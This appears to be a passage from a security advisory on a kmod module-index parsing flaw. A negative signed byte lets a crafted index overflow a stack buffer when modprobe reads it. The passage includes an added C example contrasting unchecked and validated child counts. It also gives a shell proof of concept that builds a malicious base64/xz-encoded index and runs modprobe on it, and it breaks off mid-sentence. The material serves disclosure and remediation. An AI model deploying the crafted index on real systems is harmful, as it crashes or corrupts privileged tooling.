If the value of first is negative, a broken index can trigger a stack-based buffer overflow, because child_count could become larger than INDEX_CHILDMAX.
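To make the arithmetic concrete, here is an added example (not kmod's code, and not part of the original advisory) of a node-header reader in its naive and its validated form. It assumes a header layout of one byte "first", one byte "last", followed by last - first + 1 child offsets, and it assumes INDEX_CHILDMAX is 128; both are assumptions for illustration. It only computes the count and never sizes a buffer with it, so the naive version shows the out-of-range value without overflowing anything.

```c
/* Added example, not kmod's code: how a signed "first" byte in a module
 * index node header inflates child_count, and how a validating reader
 * rejects such a node before the count is used to size a stack array.
 * Header layout and the INDEX_CHILDMAX value are assumptions. */
#include <stdio.h>

#define INDEX_CHILDMAX 128   /* assumed value for the example */

/* Naive count, as a reader using plain char on a platform where char is
 * signed (glibc/x86) would compute it. signed char is used explicitly so
 * the example behaves the same on every platform. */
int naive_child_count(const unsigned char *hdr)
{
    signed char first = (signed char)hdr[0];
    signed char last  = (signed char)hdr[1];
    return (int)last - (int)first + 1;
}

/* Validated reader: treat both bytes as unsigned, require first <= last,
 * and bound the count by INDEX_CHILDMAX.
 * Returns the child count (1..INDEX_CHILDMAX) or -1 on a broken index. */
int checked_child_count(const unsigned char *hdr)
{
    unsigned int first = hdr[0];
    unsigned int last  = hdr[1];
    if (first > last)
        return -1;                    /* empty or inverted range: refuse */
    unsigned int count = last - first + 1;
    if (count > INDEX_CHILDMAX)
        return -1;                    /* more children than the node can hold */
    return (int)count;
}

int main(void)
{
    /* Constructed headers: a sane range 'a'..'z', and a broken one where
     * first is 0x80 (negative when read as signed char). */
    const unsigned char sane[2]   = { 0x61, 0x7a };
    const unsigned char broken[2] = { 0x80, 0x7f };

    printf("sane:   naive=%d checked=%d\n",
           naive_child_count(sane), checked_child_count(sane));
    printf("broken: naive=%d checked=%d\n",
           naive_child_count(broken), checked_child_count(broken));
    return 0;
}
```

With the broken header the naive reader reports 256 children, twice INDEX_CHILDMAX, which is exactly the count a fixed-size on-stack children array cannot hold; the validated reader returns -1 and the caller can treat the index as corrupt instead of continuing to parse it.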
Proof of Concept:
Create broken index files
# Build a throwaway module directory tree for the running kernel version
MYDIR=$(mktemp -d)
KDIR=$MYDIR/lib/modules/$(uname -r)
mkdir -p $KDIR
# The crafted index, stored xz-compressed and base64-encoded
cat > $MYDIR/bin.xz.b64 << EOF
/Td6WFoAAATm1rRGBMAinAghARwAAAAAAAAAAOX2A/rgBBsAGl0AWAHahc6kB/nBvrJW9H1Nj78L
jsj0KxaUn0kAAAA4Anj08IzoigABPpwIAAAA/lBnLLHEZ/sCAAAAAARZWg==
EOF
# Decode and decompress it into modules.alias.bin ...
base64 -d $MYDIR/bin.xz.b64 | xz -cd > $KDIR/modules.alias.bin
# ... and let every other index file point at the same broken index
for i in builtin.alias builtin dep symbols
do
ln -s modules.alias.bin $KDIR/modules.$i.bin
done
Run modprobe
# -d uses $MYDIR as the root directory, -c dumps the configuration
modprobe -cd $MYDIR
On glibc-based systems, you will most likely encounter a message like
Alternatively, compile with address sanitizer.